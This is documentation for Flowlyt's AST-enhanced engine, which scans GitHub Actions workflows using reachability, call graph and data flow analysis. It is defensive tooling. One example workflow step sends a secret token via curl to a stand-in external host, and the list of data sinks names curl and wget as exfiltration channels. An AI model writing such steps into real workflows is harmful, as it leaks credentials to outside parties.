This document describes the new AST-based analysis capabilities in Flowlyt that enable reachability analysis and call graph analysis to reduce false positives and catch issues in reachable code paths.
The AST-enhanced analysis engine extends Flowlyt's existing hybrid engine with:
- Reachability Analysis - Determines which parts of workflows are actually reachable during execution
- Call Graph Analysis - Builds a graph of dependencies and calls between jobs, steps, and actions
- Data Flow Analysis - Tracks how sensitive data flows through the workflow
- False Positive Reduction - Filters out findings in unreachable code paths
The main orchestrator that coordinates parsing, reachability, and data flow analysis.
type ASTAnalyzer struct {
callGraph *CallGraph
dataFlow *DataFlowAnalyzer
reachability *ReachabilityAnalyzer
}Builds and maintains a graph of workflow components and their relationships.
type CallGraph struct {
nodes map[string]*CallNode
edges map[string][]string
}Determines which nodes are reachable from entry points (triggers).
type ReachabilityAnalyzer struct {
callGraph *CallGraph
reachableNodes map[string]bool
conditions map[string]*ConditionAnalyzer
}Tracks data sources, sinks, and flows to identify potential security issues.
type DataFlowAnalyzer struct {
sources map[string]*DataSource
sinks map[string]*DataSink
flows []*DataFlow
}The reachability analyzer determines which parts of a workflow can actually be executed:
- Entry Point Detection: Identifies workflow triggers as entry points
- Dependency Tracking: Follows job dependencies (
needsrelationships) - Conditional Analysis: Evaluates
ifconditions to determine reachability - Static Evaluation: Performs static analysis on simple conditions
Example of unreachable code detection:
jobs:
never-runs:
if: false # Statically false condition
runs-on: ubuntu-latest
steps:
- run: echo "This will never execute"
env:
SECRET: ${{ secrets.API_KEY }} # Finding here would be false positiveBuilds a comprehensive graph of workflow components:
-
Node Types:
trigger- Workflow triggers (push, PR, etc.)job- Individual jobsstep- Steps within jobsaction- External actions being usedexternal_call- Network calls, file operations, etc.
-
Edge Types:
- Trigger to job relationships
- Job dependency relationships (
needs) - Step execution order
- Action invocations
- External command calls
Tracks sensitive data movement through workflows:
-
Data Sources:
- Secrets (
${{ secrets.* }}) - GitHub context (
${{ github.* }}) - Environment variables
- Action outputs
- Secrets (
-
Data Sinks:
- Network calls (curl, wget)
- File operations
- Logging commands
- Action inputs
-
Flow Detection:
- Identifies when sensitive data reaches potentially unsafe sinks
- Calculates severity based on data sensitivity and sink risk
- Provides detailed remediation advice
import (
"github.com/harekrishnarai/flowlyt/pkg/engine"
"github.com/harekrishnarai/flowlyt/pkg/parser"
)
// Create enhanced engine with AST analysis
config := engine.DefaultASTEnhancedConfig()
config.EnableReachabilityAnalysis = true
config.EnableDataFlowAnalysis = true
config.FilterUnreachableFindings = true
enhancedEngine, err := engine.NewASTEnhancedEngine(config)
if err != nil {
log.Fatal(err)
}
// Analyze workflows
workflowFiles := []parser.WorkflowFile{
{Path: ".github/workflows/ci.yml", Content: workflowContent},
}
result, err := enhancedEngine.AnalyzeWithAST(context.Background(), workflowFiles)
if err != nil {
log.Fatal(err)
}
// Access enhanced results
fmt.Printf("Reachable nodes: %d\n", result.ReachabilityReport.ReachableNodes)
fmt.Printf("Data flow findings: %d\n", len(result.DataFlowFindings))
fmt.Printf("Filtered findings: %d\n", result.FilteredFindings)type ASTEnhancedConfig struct {
EnableReachabilityAnalysis bool // Enable reachability analysis
EnableDataFlowAnalysis bool // Enable data flow tracking
EnableCallGraphAnalysis bool // Enable call graph construction
FilterUnreachableFindings bool // Filter findings in unreachable code
MinDataFlowSeverity string // Minimum severity for data flow findings
ReachabilityConfig ReachabilityConfig
}
type ReachabilityConfig struct {
AnalyzeConditionals bool // Analyze conditional expressions
StaticEvaluation bool // Perform static evaluation of conditions
MarkUnreachableFindings bool // Mark unreachable findings instead of filtering
ReportUnreachableCode bool // Include unreachable code in reports
}By filtering out findings in unreachable code paths, the analysis becomes more precise:
jobs:
security-scan:
if: github.event_name == 'never' # Will never be true
steps:
- run: echo ${{ secrets.API_KEY }} # Finding filtered out as unreachableData flow analysis catches complex security issues:
steps:
- name: Get API data
run: |
# Data flow analysis detects secret exposure via network
curl -H "Auth: ${{ secrets.TOKEN }}" https://untrusted.com/apiUnderstanding job dependencies and execution flow:
jobs:
build:
outputs:
version: ${{ steps.version.outputs.version }}
steps:
- id: version
run: echo "version=1.0.0" >> $GITHUB_OUTPUT
deploy:
needs: build
steps:
- run: |
# Analysis understands this depends on build job output
echo "Deploying version ${{ needs.build.outputs.version }}"The AST analysis enhances existing security rules and adds new categories:
- CategoryReachability - Issues related to unreachable code
- CategoryDataFlow - Data flow security violations
- CategoryCallGraph - Issues detected through call graph analysis
- Secret Exposure: Tracks secret usage from source to potential leak points
- Privilege Escalation: Analyzes permission flows and escalation paths
- Supply Chain: Maps action dependencies and external calls
- Data Exfiltration: Detects sensitive data sent to external endpoints
The AST analysis adds computational overhead but provides significant security benefits:
- Parsing: ~10-20ms per workflow file
- Call Graph: ~5-10ms per workflow
- Reachability: ~10-30ms depending on complexity
- Data Flow: ~20-50ms depending on sources/sinks
Total overhead is typically 50-100ms per workflow, which is acceptable for most use cases.
- Dynamic Conditions: Cannot analyze conditions that depend on runtime values
- Complex Expressions: Limited static evaluation of complex conditional logic
- Cross-Workflow: Currently analyzes workflows in isolation
- Action Internals: Cannot see inside third-party actions
- Cross-Workflow Analysis: Track dependencies between workflows
- Dynamic Analysis: Integrate with runtime information
- Action Scanning: Deep analysis of popular GitHub Actions
- Machine Learning: Use ML to improve condition analysis
- Performance Optimization: Caching and incremental analysis
The AST analysis works alongside existing pattern-based rules:
- Pattern Rules: Continue to work for basic detection
- AST Enhancement: Provides additional context and filtering
- Combined Results: Merges findings from both approaches
- Confidence Scoring: AST analysis can increase confidence in findings
This creates a layered security approach that combines the speed of pattern matching with the precision of AST analysis.